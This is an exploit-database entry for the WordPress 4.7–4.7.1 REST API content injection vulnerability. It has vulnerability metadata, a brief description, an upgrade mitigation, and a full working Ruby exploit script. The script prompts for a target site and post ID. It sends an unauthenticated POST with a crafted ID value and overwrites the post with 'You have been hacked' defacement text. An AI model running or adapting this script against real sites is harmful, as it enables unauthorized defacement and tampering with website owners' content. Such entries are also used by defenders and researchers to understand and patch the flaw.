WP Content Injection

vendor:

WordPress

by:

Harsh Jaiswal

8,8

CVSS

HIGH

Content Injection

CWE

Product Name: WordPress

Affected Version From: WordPress 4.7

Affected Version To: WordPress 4.7.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Backbox Ubuntu Linux

2017

This exploit allows an attacker to inject malicious content into a WordPress site by exploiting a vulnerability in the WordPress REST API. The vulnerability affects WordPress versions 4.7 to 4.7.1, and is patched in version 4.7.2. The exploit requires the attacker to know the post ID of the post they wish to inject content into, and then use a Ruby script to send a POST request to the WordPress REST API with the malicious content. The malicious content is then injected into the post.

Mitigation:

Upgrade to WordPress version 4.7.2 or later.

Source

Exploit-DB raw data:

# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client 
# Lang : Ruby


require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {

    "id" => "#{postid}justrawdata",
    "title" => "You have been hacked",
    "content" => "Hacked please update your wordpress version"


  }.to_json,
  :content_type => :json,
  :accept => :json
) {|response, request, result| response }
if(response.code == 200)

puts "Done! '#{targeturi}/index.php?p=#{postid}'"


else
puts "This site is not Vulnerable"
end